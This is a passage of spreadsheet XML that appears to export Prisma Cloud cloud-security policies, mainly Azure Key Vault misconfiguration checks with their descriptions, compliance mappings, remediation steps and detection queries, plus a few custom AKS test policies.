        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2278" s="2" t="inlineStr"/>
      <c r="D2278" t="inlineStr"/>
      <c r="E2278" t="inlineStr"/>
      <c r="F2278" t="inlineStr"/>
      <c r="G2278" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2278" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2278" t="inlineStr">
        <is>
          <t>Azure Key Vault is not recoverable</t>
        </is>
      </c>
      <c r="L2278" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2278" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2278" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2278" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2278" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2278" t="inlineStr">
        <is>
          <t>Other Security Considerations</t>
        </is>
      </c>
      <c r="R2278" t="inlineStr">
        <is>
          <t>8.4</t>
        </is>
      </c>
      <c r="S2278" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="T2278" t="b">
        <v>1</v>
      </c>
      <c r="U2278" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2278" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2278" t="inlineStr">
        <is>
          <t>The key vault contains object keys, secrets and certificates. Accidental unavailability of a key vault can cause immediate data loss or loss of security functions (authentication, validation, verification, non-repudiation, etc.) supported by the key vault objects.
It is recommended the key vault be made recoverable by enabling the "Do Not Purge" and "Soft Delete" functions. This is in order to prevent loss of encrypted data including storage accounts, SQL databases, and/or dependent services provided by key vault objects (Keys, Secrets, Certificates) etc., as may happen in the case of accidental deletion by a user or from disruptive activity by a malicious user.</t>
        </is>
      </c>
      <c r="X2278" t="inlineStr">
        <is>
          <t>Azure Portal
Azure Portal does not have provision to update the respective configurations
Azure CLI 2.0
az resource update --id /subscriptions/xxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/&lt;resourceGroupName&gt;/providers/Microsoft.KeyVault/vaults/&lt;keyVaultName&gt; --set properties.enablePurgeProtection=true properties.enableSoftDelete=true 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable</t>
        </is>
      </c>
      <c r="Y2278" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.KeyVault/*' permission. Successful execution will enable Purge Protection and Soft Delete rule for Key Vault.\nNote: Once purge-protection and soft-delete is enabled for a key vault,
the action is irreversible.",
'impact': 'enables enablePurgeProtection and enableSoftDelete in Azure Key Vault',
'cliScriptTemplate': 'az keyvault update --name $resourceName --set properties.enablePurgeProtection=true properties.enableSoftDelete=true'</t>
        </is>
      </c>
      <c r="Z2278" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-key-vault-list' AND json.rule = 'properties.enableSoftDelete does not exist or properties.enablePurgeProtection does not exist'
{"category":"General","resourceTypes":["azurerm_key_vault"]}</t>
        </is>
      </c>
      <c r="AA2278" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2278" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2278" t="inlineStr">
        <is>
          <t>PC-AZR-KV-416-CKV_AZURE_42</t>
        </is>
      </c>
      <c r="AD2278" t="b">
        <v>1</v>
      </c>
      <c r="AE2278" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2278" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>6c9c2a98-811f-4a04-8202-51285308bad9</t>
        </is>
      </c>
      <c r="AI2278" t="inlineStr">
        <is>
          <t>045f2c23-66af-40ef-a0cf-e04f5cda9843</t>
        </is>
      </c>
      <c r="AJ2278" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2278" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2279">
      <c r="A2279" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, ISO/IEC 27002:2013, CSA CCM v4.0.12, CIS v1.3.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, PCI DSS v3.2.1, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], CIS v1.3.1 (Azure), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS v1.1 (Azure), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, MTSBv2_Azure, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NIST CSF, CIS v2.1.0 (Azure) Level 1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.6, NIST CSF v2.0, Copy of CIS v1.2.0 (Azure), CIS v1.2.0 (Azure), New Zealand Information Security Manual (NZISM v3.4), CyberSecurity Law of the People's Republic of China, CIS v1.4.0 (Azure), Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, MITRE ATT&amp;CK v8.2 [Deprecated], PCI DSS v4.0, ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), testazure, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), CSA CCM v4.0.12, NIST 800-53 Rev4, FFIEC, CRI Profile v2.0, Copy of CIS Controls v8, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, NIST SP 800-171 Revision 3, RBI Baseline Cyber Security and Resilience Requirements, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ISO/IEC 27002:2013, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v4.0.12, CCPA 2018, CIS v2.0.0 (Azure) Level 1, PIPEDA, CyberSecurity Law of the People's Republic of China, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO 27002:2022, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, NIST 800-53 Rev 5, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2279" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2279" s="2" t="inlineStr"/>
      <c r="D2279" t="inlineStr"/>
      <c r="E2279" t="inlineStr"/>
      <c r="F2279" t="inlineStr"/>
      <c r="G2279" t="b">
        <v>1</v>
      </c>
      <c r="H22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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2279" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2279" t="inlineStr">
        <is>
          <t>Azure Key Vault Key has no expiration date (Non-RBAC Key vault)</t>
        </is>
      </c>
      <c r="L2279" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2279" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2279" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2279" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2279" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2279" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2279" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2279" t="inlineStr"/>
      <c r="T2279" t="b">
        <v>0</v>
      </c>
      <c r="U2279" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2279" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2279" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault keys that do not have an expiration date for the Non-RBAC Key vaults. As a best practice, set an expiration date for each key and rotate your keys regularly.
Before you activate this policy, ensure that you have added the Prisma Cloud Service Principal to each Key Vault: https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-azure-account/azure-onboarding-checklist
Alternatively, run the following command on the Azure cloud shell:
az keyvault list | jq '.[].name' | xargs -I {} az keyvault set-policy --name {} --certificate-permissions list listissuers --key-permissions list --secret-permissions list --spn &lt;prismacloud_app_id&gt;</t>
        </is>
      </c>
      <c r="X2279" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'All services' &gt; 'Key vaults'
3. Select the Key vault where the key is stored
4. Select 'Keys', and select the key that you need to modify
5. Select the current version
6. Set the expiration date
7. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2279" t="inlineStr"/>
      <c r="Z2279" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' and json.rule = keys[?any(attributes.exp equals -1 and attributes.enabled contains true)] exists and properties.enableRbacAuthorization is false</t>
        </is>
      </c>
      <c r="AA2279" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2279" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2279" t="inlineStr">
        <is>
          <t>PC-AZR-KV-820</t>
        </is>
      </c>
      <c r="AD2279" t="b">
        <v>1</v>
      </c>
      <c r="AE2279" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2279" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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79" t="inlineStr">
        <is>
          <t>5eaf1168-8476-4fad-9331-d76e41d4c80d</t>
        </is>
      </c>
      <c r="AI2279" t="inlineStr">
        <is>
          <t>d27cf01f-e853-4aea-b55e-8cfb8fef368a</t>
        </is>
      </c>
      <c r="AJ2279" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2279" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2280">
      <c r="A2280" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), Microsoft Cloud Security Benchmark v1, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MLPS 2.0 (Level 2), CSA CCM v4.0.12, PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ITSG-33, CIS v1.4.0 (Azure), Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CIS v1.5.0 (Azure) - Level 1, CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, Copy of Azure Security Benchmark (v3), CIS Controls v7.1, Copy of CIS v1.2.0 (Azure), ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Azure Security Benchmark (v3), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Azure Security Benchmark (v2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, GDPR, CSA CCM v4.0.12, PCI DSS v4.0, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CSA CCM v4.0.12, Azure Security Benchmark (v3), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, SOC 2, FFIEC, CSA CCM v.4.0.1, CIS v1.3.0 (Azure), CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, CSA CCM v4.0.12, HIPAA, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, ISO/IEC 27002:2013, TX-RAMP Level 1, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, Copy of Azure Security Benchmark (v3), DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, PCI DSS v4.0, CIS v1.2.0 (Azure), MTSBv2_Azure, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.1 (Azure)</t>
        </is>
      </c>
      <c r="B2280" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2280" s="2" t="inlineStr"/>
      <c r="D2280" t="inlineStr"/>
      <c r="E2280" t="inlineStr"/>
      <c r="F2280" t="inlineStr"/>
      <c r="G2280" t="b">
        <v>1</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2280" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2280" t="inlineStr">
        <is>
          <t>Azure Key vaults diagnostics logs are disabled</t>
        </is>
      </c>
      <c r="L2280" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2280" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2280" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2280" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2280" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2280" t="inlineStr">
        <is>
          <t>Logging and Monitoring</t>
        </is>
      </c>
      <c r="R2280" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="S2280" t="inlineStr"/>
      <c r="T2280" t="b">
        <v>0</v>
      </c>
      <c r="U2280" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2280" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2280" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key vaults which has diagnostics logs disabled. Enabling Diagnostic Logs gives visibility into the data plane thus gives organisation ability to detect reconnaissance, authorization attempts or other malicious activity. It is recommended to enable diagnostics logs settings for Azure Key vaults.</t>
        </is>
      </c>
      <c r="X2280" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal.
2. Navigate to 'Key vaults', and select the reported key vault from the list
3. Select 'Diagnostic settings' under 'Monitoring' section
4. Click on '+Add diagnostic setting'
5. Specify a 'Diagnostic settings name',
6. Under 'Category details' section, select the type of 'Log' that you want to enable
7. Under section 'Destination details',
a. If you select 'Send to Log Analytics', select the 'Subscription' and 'Log Analytics workspace'
b. If you set 'Archive to storage account', select the 'Subscription', 'Storage account' and set the 'Retention (days)'
c. If you set 'Stream to an event hub', select the 'Subscription', 'Event hub namespace', 'Event hub name' and set the 'Event hub policy name'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2280" t="inlineStr"/>
      <c r="Z2280" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' AND json.rule = diagnosticSettings.value[*] size equals 0</t>
        </is>
      </c>
      <c r="AA2280" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2280" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2280" t="inlineStr">
        <is>
          <t>PC-AZR-KV-615</t>
        </is>
      </c>
      <c r="AD2280" t="b">
        <v>1</v>
      </c>
      <c r="AE2280" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2280" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>922d0974-a29b-42f5-91ea-99da087a1718</t>
        </is>
      </c>
      <c r="AI2280" t="inlineStr">
        <is>
          <t>3e36c169-f9c6-44a6-9c2e-f60fa40035ad</t>
        </is>
      </c>
      <c r="AJ2280" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2280" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2281">
      <c r="A2281" t="inlineStr"/>
      <c r="B2281" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2281" s="2" t="inlineStr"/>
      <c r="D2281" t="inlineStr"/>
      <c r="E2281" t="inlineStr"/>
      <c r="F2281" t="inlineStr"/>
      <c r="G2281" t="b">
        <v>0</v>
      </c>
      <c r="H22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81" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2281" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2281" t="inlineStr">
        <is>
          <t>cj-test-2</t>
        </is>
      </c>
      <c r="L2281" t="inlineStr"/>
      <c r="M2281" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2281" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2281" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2281" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2281" t="inlineStr"/>
      <c r="R2281" t="inlineStr"/>
      <c r="S2281" t="inlineStr"/>
      <c r="T2281" t="b">
        <v>0</v>
      </c>
      <c r="U2281" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2281" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2281" t="inlineStr"/>
      <c r="X2281" t="inlineStr"/>
      <c r="Y2281" t="inlineStr"/>
      <c r="Z2281" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-kubernetes-cluster' AND json.rule = id contains "cmust"</t>
        </is>
      </c>
      <c r="AA2281" t="inlineStr">
        <is>
          <t>Christie Mustone</t>
        </is>
      </c>
      <c r="AB2281" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2281" t="inlineStr"/>
      <c r="AD2281" t="b">
        <v>0</v>
      </c>
      <c r="AE2281" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2281" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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81" t="inlineStr">
        <is>
          <t>0d0236c0-ec46-4d04-ab61-3f1da30f1282</t>
        </is>
      </c>
      <c r="AI2281" t="inlineStr">
        <is>
          <t>a4f36fe4-ad9c-40c5-9cf3-6ce0e3c9fb14</t>
        </is>
      </c>
      <c r="AJ2281" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2281" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2282">
      <c r="A2282" t="inlineStr"/>
      <c r="B2282" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2282" s="2" t="inlineStr"/>
      <c r="D2282" t="inlineStr"/>
      <c r="E2282" t="inlineStr"/>
      <c r="F2282" t="inlineStr"/>
      <c r="G2282" t="b">
        <v>0</v>
      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2282" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2282" t="inlineStr">
        <is>
          <t>run_policy_001: custom run policy #1 created with terraform</t>
        </is>
      </c>
      <c r="L2282" t="inlineStr"/>
      <c r="M2282" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2282" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2282" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2282" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2282" t="inlineStr"/>
      <c r="R2282" t="inlineStr"/>
      <c r="S2282" t="inlineStr">
        <is>
          <t>some_tag</t>
        </is>
      </c>
      <c r="T2282" t="b">
        <v>0</v>
      </c>
      <c r="U2282" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2282" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2282" t="inlineStr">
        <is>
          <t>this describes the policy</t>
        </is>
      </c>
      <c r="X2282" t="inlineStr"/>
      <c r="Y2282" t="inlineStr"/>
      <c r="Z2282" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule =  properties.enableRBAC is false</t>
        </is>
      </c>
      <c r="AA2282" t="inlineStr">
        <is>
          <t>Prakash Kumar</t>
        </is>
      </c>
      <c r="AB2282" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2282" t="inlineStr"/>
      <c r="AD2282" t="b">
        <v>0</v>
      </c>
      <c r="AE2282" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2282" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>745dbeac-f059-40dd-b083-01f736251e90</t>
        </is>
      </c>
      <c r="AI2282" t="inlineStr">
        <is>
          <t>006d6684-3160-42c3-8c20-84324b35cfcd</t>
        </is>
      </c>
      <c r="AJ2282" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2282" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2283">
      <c r="A2283" t="inlineStr"/>
      <c r="B2283" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2283" s="2" t="inlineStr"/>
      <c r="D2283" t="inlineStr"/>
      <c r="E2283" t="inlineStr"/>
      <c r="F2283" t="inlineStr"/>
      <c r="G2283" t="b">
        <v>0</v>
      </c>
      <c r="H22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83" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2283" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2283" t="inlineStr">
        <is>
          <t>run_policy_003: custom run policy #2 created with terraform</t>
        </is>
      </c>
      <c r="L2283" t="inlineStr"/>
      <c r="M2283" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2283" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2283" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2283" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2283" t="inlineStr"/>
      <c r="R2283" t="inlineStr"/>
      <c r="S2283" t="inlineStr">
        <is>
          <t>some_tag</t>
        </is>
      </c>
      <c r="T2283" t="b">
        <v>0</v>
      </c>
      <c r="U2283" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2283" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2283" t="inlineStr">
        <is>
          <t>this describes the policy</t>
        </is>
      </c>
      <c r="X2283" t="inlineStr"/>
      <c r="Y2283" t="inlineStr"/>
      <c r="Z2283" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule =  properties.enableRBAC is false</t>
        </is>
      </c>
      <c r="AA2283" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2283" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2283" t="inlineStr"/>
      <c r="AD2283" t="b">
        <v>0</v>
      </c>
      <c r="AE2283" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2283" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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83" t="inlineStr">
        <is>
          <t>34c59d9c-05bd-421b-b653-61f28040239a</t>
        </is>
      </c>
      <c r="AI2283" t="inlineStr">
        <is>
          <t>511ead21-5b36-4f6f-a12c-0520419a0748</t>
        </is>
      </c>
      <c r="AJ2283" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2283" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2284">
      <c r="A2284" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Insurance Regulatory And Development Authority Of India, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019</t>
        </is>
      </c>
